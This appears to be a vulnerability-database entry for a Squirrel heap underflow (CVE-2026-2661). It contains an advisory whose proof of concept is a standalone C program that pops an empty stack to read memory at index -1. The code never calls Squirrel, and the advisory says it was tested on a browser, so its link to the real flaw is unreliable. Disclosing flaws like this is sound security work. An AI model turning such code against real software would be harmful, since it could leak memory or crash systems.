📄 Squirrel Out-Of-Bounds Read

🗓️ 23 Feb 2026 00:00:00Reported by indoushkaType

Squirrel stack pop lacks bounds check, reads data[size-1] on empty stack, causing heap underflow.

Reporter	Title	Published	Views	Family All 14
CNNVD	SQUIRREL 安全漏洞	18 Feb 202600:00	–	cnnvd
CVE	CVE-2026-2661	18 Feb 202619:02	–	cve
Cvelist	CVE-2026-2661 Squirrel sqobject.h operator heap-based overflow	18 Feb 202619:02	–	cvelist
Debian CVE	CVE-2026-2661	18 Feb 202619:02	–	debiancve
NVD	CVE-2026-2661	18 Feb 202620:18	–	nvd
OSV	DEBIAN-CVE-2026-2661	18 Feb 202620:18	–	osv
OSV	UBUNTU-CVE-2026-2661	18 Feb 202620:18	–	osv
Positive Technologies	PT-2026-20485	18 Feb 202600:00	–	ptsecurity
RedhatCVE	CVE-2026-2661	19 Feb 202619:21	–	redhatcve
Snyk	Heap-based Buffer Overflow	18 Feb 202621:04	–	snyk

=============================================================================================================================================
    | # Title     : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : http://squirrel-lang.org/                                                                                                   |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability exists in the Squirrel engine’s stack implementation due to missing bounds checking in the PopTarget function. 
                      When attempting to pop from an empty stack, the function reads from data[size - 1] (index -1), causing a heap buffer underflow.
    
    [+] This allows:
    
    Information disclosure (heap metadata or adjacent memory content)
    
    Application crashes (segmentation faults)
    
    Potential escalation if the leaked memory affects control flow
    
    [+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow
    
    [+] Affected Component: Stack management in Squirrel Engine
    
    [+] Save as: poc.c
    
    [+] Translation with AddressSanitizer protection (recommended) : gcc -fsanitize=address -g poc.c -o poc
    
    [+] Run : ./poc
    
    [+] An ASAN report similar to:
    
    heap-buffer-overflow
    
    READ of size 8
    
    [+] POC   : 
    
    #include <stdio.h>
    #include <stdlib.h>
    
    typedef struct {
        long long *data;
        int size;
        int capacity;
    } TargetStack;
    
    long long PopTarget(TargetStack *stack) {
    
        long long target = stack->data[stack->size - 1]; 
        stack->size--;
        return target;
    }
    
    int main() {
    
        TargetStack stack;
        stack.capacity = 4;
        stack.size = 0; 
        stack.data = (long long *)malloc(stack.capacity * sizeof(long long));
    
        if (stack.data == NULL) return 1;
    
        printf("Starting PoC...\n");
        printf("Stack size: %d\n", stack.size);
        printf("Attempting to PopTarget from empty stack...\n");
        
        long long leaked_data = PopTarget(&stack);
        printf("Leaked data from index [-1]: %lld\n", leaked_data);
    
        free(stack.data);
        return 0;
    }
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

23 Feb 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.13.3 - 7.8

CVSS 21.7

CVSS 44.8

CVSS 33.3

EPSS0.00011

SSVC